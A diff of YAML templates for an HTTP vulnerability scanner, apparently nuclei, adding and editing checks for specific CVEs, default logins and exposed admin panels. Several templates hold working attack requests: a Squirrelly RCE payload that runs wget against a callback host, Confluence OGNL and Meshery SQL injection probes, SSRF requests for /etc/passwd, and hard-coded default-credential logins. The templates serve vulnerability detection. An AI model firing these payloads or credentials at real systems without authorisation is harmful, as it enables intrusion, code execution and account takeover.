||||
words:
|
||||
- "prtg_network_monitor"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2020-28976
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
|
||||
author: LogicalHunter
|
||||
severity: high
|
||||
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49189
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
|
||||
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
|
||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
|
||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
|
||||
reference:
|
||||
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
||||
|
|
|
@ -13,9 +13,6 @@ info:
|
|||
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
||||
- https://www.hpe.com/us/en/home.html # vendor homepage
|
||||
|
||||
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
||||
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2021-22145
|
||||
|
||||
info:
|
||||
name: ElasticSearch 7.13.3 - Memory disclosure
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
|
||||
reference:
|
||||
- https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22145
|
||||
- https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
|
||||
tags: cve,cve2021,elascticsearch
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/_bulk'
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
@
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'root_cause'
|
||||
- 'truncated'
|
||||
- 'reason'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
|
@ -18,7 +18,9 @@ requests:
|
|||
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
|
||||
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2021-24288
|
||||
|
||||
info:
|
||||
name: AcyMailing < 7.5.0 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription.
|
||||
reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
|
||||
tags: wordpress,cve,cve2021,redirect,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
|
|
@ -5,6 +5,7 @@ info:
|
|||
author: johnjhacking
|
||||
severity: medium
|
||||
tags: cve,cve2021,wp-plugin,wordpress,xss
|
||||
description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
|
||||
- https://wordpress.org/plugins/marmoset-viewer/#developers
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-26084
|
||||
|
||||
info:
|
||||
author: dhiyaneshDk,philippedelteil
|
||||
severity: critical
|
||||
name: Confluence Server OGNL injection - RCE
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
tags: cve,cve2021,rce,confluence
|
||||
reference:
|
||||
- https://jira.atlassian.com/browse/CONFSERVER-67940
|
||||
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
|
||||
- https://github.com/Udyz/CVE-2021-26084
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /{{path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
|
||||
|
||||
payloads:
|
||||
path:
|
||||
- pages/createpage-entervariables.action?SpaceKey=x
|
||||
- confluence/pages/createpage-entervariables.action?SpaceKey=x
|
||||
- wiki/pages/createpage-entervariables.action?SpaceKey=x
|
||||
- pages/doenterpagevariables.action
|
||||
- pages/createpage.action?spaceKey=myproj
|
||||
- pages/templates2/viewpagetemplate.action
|
||||
- pages/createpage-entervariables.action
|
||||
- template/custom/content-editor
|
||||
- templates/editor-preload-container
|
||||
- users/user-dark-features
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="aaaa{140592=null}'
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2021-28918
|
||||
|
||||
info:
|
||||
name: Netmask NPM Package SSRF
|
||||
author: johnjhacking
|
||||
severity: critical
|
||||
description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
|
||||
tags: cve,cve2021,npm,netmask,ssrf,lfi
|
||||
reference:
|
||||
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
|
||||
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
|
||||
- "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
|
||||
- "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Apache Server Status"
|
||||
- "Server Version"
|
||||
condition: and
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2021-31856
|
||||
|
||||
info:
|
||||
name: Layer5 Meshery 0.5.2 SQLi
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
|
||||
reference:
|
||||
- https://github.com/ssst0n3/CVE-2021-31856
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-31856
|
||||
tags: sqli,cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "709b38b27304df6257a86a60df742c4c"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2021-32819
|
||||
|
||||
info:
|
||||
name: Nodejs squirrelly template engine RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: |
|
||||
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
|
||||
options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
|
||||
currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
|
||||
- https://www.linuxlz.com/aqld/2331.html
|
||||
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
|
||||
tags: cve,cve2021,nodejs,rce,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2021-34370
|
||||
|
||||
info:
|
||||
name: Accela Civic Platform 21.1 - Open Redirect & XSS
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49990
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-34370
|
||||
- https://www.accela.com/civic-platform/
|
||||
tags: xss,redirect,cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
|
|
@ -0,0 +1,65 @@
|
|||
id: cs141-default-login
|
||||
|
||||
info:
|
||||
name: CS141 SNMP Module Default Credentials
|
||||
author: socketz
|
||||
severity: medium
|
||||
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
|
||||
tags: hiawatha,iot,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"admin","password":"cs141-snmp"}
|
||||
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"engineer","password":"engineer"}
|
||||
|
||||
- |
|
||||
POST /api/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 44
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||
Connection: close
|
||||
|
||||
{"userName":"guest","password":"guest"}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'accessToken'
|
||||
- 'application/json'
|
||||
condition: and
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- accessToken
|
|
@ -50,7 +50,7 @@ requests:
|
|||
- password
|
||||
|
||||
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,54 @@
|
|||
id: vidyo-default-credentials
|
||||
|
||||
info:
|
||||
name: Vidyo Default Credentials
|
||||
author: izn0u
|
||||
severity: medium
|
||||
description: test for default cred super:password
|
||||
reference: https://support.vidyocloud.com/hc/en-us/articles/226265128
|
||||
tags: vidyo,default-login
|
||||
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /super/login.html?lang=en HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
|
||||
- |
|
||||
POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{RootURL}}/super/login.html?lang=en
|
||||
Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
|
||||
|
||||
username=super&password=password
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf_tkn
|
||||
group: 1
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- 'csrf_tkn=([A-Za-z0-9.-]+)'
|
||||
|
||||
- type: kval
|
||||
name: session
|
||||
internal: true
|
||||
part: header
|
||||
kval:
|
||||
- JSESSIONID
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "/super/index.html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
@ -0,0 +1,28 @@
|
|||
id: wso2-management-console-default-password
|
||||
|
||||
info:
|
||||
name: WSO2 Management Console Default Password
|
||||
author: cocxanh
|
||||
severity: high
|
||||
reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
|
||||
tags: default-login,wso2
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /carbon/admin/login_action.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
Content-Length: 29
|
||||
|
||||
username=admin&password=admin
|
||||
redirects: false
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "/carbon/admin/index.jsp?loginStatus=true"
|
||||
- "JSESSIONID"
|
||||
part: header
|
||||
condition: and
|
|
@ -22,6 +22,7 @@ requests:
|
|||
- '{{BaseURL}}/sql.php'
|
||||
- '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: cisco-security-details
|
||||
id: cisco-meraki-exposure
|
||||
|
||||
info:
|
||||
name: Cisco Meraki cloud & Security Appliance details
|
||||
author: dhiyaneshDK
|
||||
name: Cisco Meraki cloud & security Appliances Information Disclosure
|
||||
author: dhiyaneshDK,r3naissance
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6708
|
||||
tags: panel,cisco
|
||||
tags: panel,cisco,meraki,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -17,6 +17,9 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- 'Your client connection'
|
||||
- 'This security appliance is directly connected to a local network'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -13,7 +13,13 @@ requests:
|
|||
- '{{BaseURL}}/dbconsole/'
|
||||
- '{{BaseURL}}/h2-console/'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>H2 Console</title>"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Sorry, remote connections ('webAllowOthers') are disabled on this server"
|
||||
negative: true
|
||||
|
|
|
@ -13,6 +13,7 @@ requests:
|
|||
- "{{BaseURL}}/jira/secure/Dashboard.jspa"
|
||||
- "{{BaseURL}}/login.jsp"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
|
|
|
@ -22,10 +22,12 @@ requests:
|
|||
- "{{BaseURL}}/xampp/phpmyadmin/"
|
||||
- "{{BaseURL}}/phpMyAdmin/"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>phpMyAdmin"
|
||||
- "pmahomme"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
|
|
|
@ -14,6 +14,8 @@ requests:
|
|||
- '{{BaseURL}}/zp/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -14,6 +14,7 @@ requests:
|
|||
- '{{BaseURL}}/sphider/admin/admin.php'
|
||||
- '{{BaseURL}}/search/admin/admin.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -51,6 +51,7 @@ requests:
|
|||
- "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
|
||||
- "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -17,26 +17,27 @@ requests:
|
|||
- "{{BaseURL}}/api/application.wadl"
|
||||
- "{{BaseURL}}/api/v1/application.wadl"
|
||||
- "{{BaseURL}}/api/v2/application.wadl"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- name: http-get
|
||||
type: word
|
||||
words:
|
||||
- "This is simplified WADL with user and core resources only"
|
||||
- "\"http://jersey.java.net/\""
|
||||
- "http://jersey.java.net"
|
||||
- "http://wadl.dev.java.net/2009/02"
|
||||
condition: or
|
||||
part: body
|
||||
|
||||
- method: OPTIONS
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/api/v1"
|
||||
- "{{BaseURL}}/api/v2"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- name: http-options
|
||||
type: word
|
||||
words:
|
||||
- "This is simplified WADL with user and core resources only"
|
||||
- "\"http://jersey.java.net/\""
|
||||
- "http://jersey.java.net"
|
||||
- "http://wadl.dev.java.net/2009/02"
|
||||
condition: or
|
||||
part: body
|
||||
|
|
|
@ -24,3 +24,7 @@ requests:
|
|||
words:
|
||||
- "application/octet-stream"
|
||||
part: header
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'len(body) > 2'
|
||||
|
|
|
@ -19,6 +19,7 @@ requests:
|
|||
- "{{BaseURL}}/docker-compose-dev.yml"
|
||||
- "{{BaseURL}}/docker-compose.override.yml"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
|
|
|
@ -22,8 +22,8 @@ requests:
|
|||
- '{{BaseURL}}/events../.git/config'
|
||||
- '{{BaseURL}}/media../.git/config'
|
||||
- '{{BaseURL}}/lib../.git/config'
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -14,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}/axis2-web/HappyAxis.jsp"
|
||||
- "{{BaseURL}}/happyaxis.jsp"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -29,6 +29,7 @@ requests:
|
|||
- '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)'
|
||||
- '(?i)(!native)|(.*keybindings)'
|
||||
- '(?i)(layout|a)key'
|
||||
- '(?i)token_expires_in'
|
||||
condition: or
|
||||
negative: true
|
||||
|
||||
|
|
|
@ -25,7 +25,7 @@ requests:
|
|||
|
||||
attack: sniper
|
||||
threads: 50
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
|
|
|
@ -18,8 +18,9 @@ requests:
|
|||
header: helpers/payloads/request-headers.txt
|
||||
payload: helpers/payloads/command-injection.txt
|
||||
attack: clusterbomb
|
||||
redirects: true
|
||||
|
||||
redirects: true
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -22,7 +22,7 @@ requests:
|
|||
attack: sniper
|
||||
threads: 50
|
||||
max-size: 500 # Size in bytes - Max Size to read from server response
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: binary
|
||||
|
|
|
@ -22,7 +22,7 @@ requests:
|
|||
passwords: helpers/wordlists/wp-passwords.txt
|
||||
threads: 50
|
||||
attack: clusterbomb
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -16,6 +16,7 @@ requests:
|
|||
- "{{BaseURL}}/a.htaccess"
|
||||
- "{{BaseURL}}/htaccess_for_page_not_found_redirects.htaccess"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -1,17 +0,0 @@
|
|||
id: missing-csp
|
||||
info:
|
||||
name: CSP Not Enforced
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: Checks if there is a CSP header
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(tolower(all_headers), ''content-security-policy'')'
|
|
@ -1,17 +0,0 @@
|
|||
id: missing-hsts
|
||||
info:
|
||||
name: Strict Transport Security Not Enforced
|
||||
author: Dawid Czarnecki
|
||||
severity: info
|
||||
description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(tolower(all_headers), ''strict-transport-security'')'
|
|
@ -1,18 +0,0 @@
|
|||
id: missing-x-content-type-options
|
||||
|
||||
info:
|
||||
name: X-Content-Type-Options unidentified
|
||||
author: G4L1T0 and @convisoappsec
|
||||
severity: info
|
||||
description: Check for X-Content-Type-Options header
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(tolower(all_headers), ''x-content-type-options'')'
|
|
@ -1,19 +0,0 @@
|
|||
id: missing-x-frame-options
|
||||
|
||||
info:
|
||||
name: Clickjacking (Missing XFO header)
|
||||
author: kurohost
|
||||
severity: low
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(all_headers), 'x-frame-options')"
|
|
@ -18,6 +18,7 @@ requests:
|
|||
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -20,6 +20,7 @@ requests:
|
|||
- "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
|
||||
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
|
|
|
@ -66,6 +66,8 @@ requests:
|
|||
- '{{BaseURL}}///etc.children.json/FNZ.html'
|
||||
- '{{BaseURL}}///etc.children.json/FNZ.png'
|
||||
- '{{BaseURL}}///etc.children.json/FNZ.ico'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -16,6 +16,7 @@ requests:
|
|||
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
|
||||
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -13,9 +13,8 @@ requests:
|
|||
- "{{BaseURL}}/views/ajax/autocomplete/user/a"
|
||||
- "{{BaseURL}}/?q=admin/views/ajax/autocomplete/user/a"
|
||||
- "{{BaseURL}}/?q=views/ajax/autocomplete/user/a"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -13,17 +13,19 @@ requests:
|
|||
- "{{BaseURL}}/user/1"
|
||||
- "{{BaseURL}}/user/2"
|
||||
- "{{BaseURL}}/user/3"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 301
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: header
|
||||
|
|
|
@ -0,0 +1,127 @@
|
|||
id: http-missing-security-headers
|
||||
|
||||
info:
|
||||
name: HTTP Missing Security Headers
|
||||
author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
|
||||
severity: info
|
||||
description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
|
||||
tags: misconfig,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
name: strict-transport-security
|
||||
regex:
|
||||
- "(?i)strict-transport-security"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: content-security-policy
|
||||
regex:
|
||||
- "(?i)content-security-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: x-frame-options
|
||||
regex:
|
||||
- "(?i)x-frame-options"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
